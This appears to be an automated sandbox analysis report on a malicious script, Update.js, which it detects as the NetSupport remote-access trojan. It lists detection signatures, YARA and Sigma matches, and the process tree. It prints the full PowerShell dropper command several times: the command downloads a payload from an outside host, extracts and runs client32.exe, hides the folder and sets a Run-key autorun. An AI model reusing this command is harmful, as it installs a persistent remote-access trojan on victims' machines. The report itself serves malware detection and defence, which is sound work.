
Windows Analysis Report
Update.js

Overview

General Information

Sample name: Update.js
Analysis ID: 1529030
MD5: 01d7daa58e16da2b30ac20fe57081bba
SHA1: 8213900420ed4c22b1e896acb53f99a5989cb2cd
SHA256: a05933c299a81badef96fd575ff0f7d934c3edaf0f7478e897a2299f1ef8f11e

Detection

NetSupport RAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Powershell drops NetSupport RAT client
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Contains functionality to detect sleep reduction / modifications
Contains functionality to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Powershell drops PE file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious PowerShell Download - PoshModule
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool
Yara signature match

Classification

  • System is w10x64_ra
  • wscript.exe (PID: 7024 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6704 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • client32.exe (PID: 4108 cmdline: "C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe" MD5: C4F1B50E3111D29774F7525039FF7086)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
sslproxydump.pcap | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | (matched strings listed below)
  • 0x1d82b6:$b1: ::WriteAllBytes(
  • 0x1d8181:$b2: ::FromBase64String(
  • 0x6403b:$s3: Reverse
  • 0x640c3:$s3: Reverse
  • 0x6441f:$s3: reverse
  • 0x64475:$s3: Reverse
  • 0x644c8:$s3: Reverse
  • 0x64757:$s3: reverse
  • 0x647ad:$s3: Reverse
  • 0x647c9:$s3: reverse
  • 0x64c69:$s3: Reverse
  • 0x64cd2:$s3: Reverse
  • 0x64f96:$s3: Reverse
  • 0x65002:$s3: Reverse
  • 0x65082:$s3: Reverse
  • 0x650fb:$s3: Reverse
  • 0x6515b:$s3: Reverse
  • 0x6519f:$s3: reverse
  • 0x652f7:$s3: Reverse
  • 0x65360:$s3: Reverse
  • 0x653d6:$s3: Reverse
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICHEK.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\pcicapi.dll | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\TCCTL32.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\HTCTL32.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
Source | Rule | Description | Author | Strings
0000000A.00000002.2489223815.0000000000442000.00000002.00000001.01000000.00000008.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
0000000A.00000002.2505080118.0000000002E68000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
Source | Rule | Description | Author | Strings
10.2.client32.exe.747f0000.5.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
10.0.client32.exe.440000.0.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
10.2.client32.exe.73a80000.4.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
10.2.client32.exe.111b8c68.1.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
10.2.client32.exe.111b8c68.1.raw.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
Source | Rule | Description | Author | Strings
amsi64_7024.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | (matched strings listed below)
  • 0x1c603b:$b1: ::WriteAllBytes(
  • 0x1c5f06:$b2: ::FromBase64String(
  • 0x6034a:$s3: Reverse
  • 0x603d5:$s3: Reverse
  • 0x60667:$s3: reverse
  • 0x606bd:$s3: Reverse
  • 0x60710:$s3: Reverse
  • 0x609a9:$s3: reverse
  • 0x609ff:$s3: Reverse
  • 0x60a1b:$s3: reverse
  • 0x60e8d:$s3: Reverse
  • 0x60ef7:$s3: Reverse
  • 0x61184:$s3: Reverse
  • 0x611f1:$s3: Reverse
  • 0x61273:$s3: Reverse
  • 0x612ed:$s3: Reverse
  • 0x6134e:$s3: Reverse
  • 0x61394:$s3: reverse
  • 0x614f3:$s3: Reverse
  • 0x6155c:$s3: Reverse
  • 0x615d3:$s3: Reverse

System Summary

Source: Process started
Author: Florian Roth (Nextron Systems)
Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7024, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System

Source: Process started
Author: Florian Roth (Nextron Systems)
Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7024, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System

Source: Network Connection
Author: frack113, Florian Roth
Data: DestinationIp: 77.83.199.112, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7024, Protocol: tcp, SourceIp: 192.168.2.16, SourceIsIpv6: false, SourcePort: 49705

Source: Process started
Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)
Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7024, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System

Source: Process started
Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community
Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4380, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", ProcessId: 7024, ProcessName: wscript.exe

Source: Registry Key set
Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
Data: Details: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6704, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DIWFE

Source: File created
Author: frack113, Nasreddine Bencherchali (Nextron Systems)
Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6704, TargetFilename: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe

Source: Process started
Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro
Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7024, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System

Source: Process started
Author: Florian Roth (Nextron Systems)
Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7024, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System

Source: Network Connection
Author: frack113
Data: DestinationIp: 77.83.199.112, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7024, Protocol: tcp, SourceIp: 192.168.2.16, SourceIsIpv6: false, SourcePort: 49705

Source: Event Logs
Author: Florian Roth (Nextron Systems)
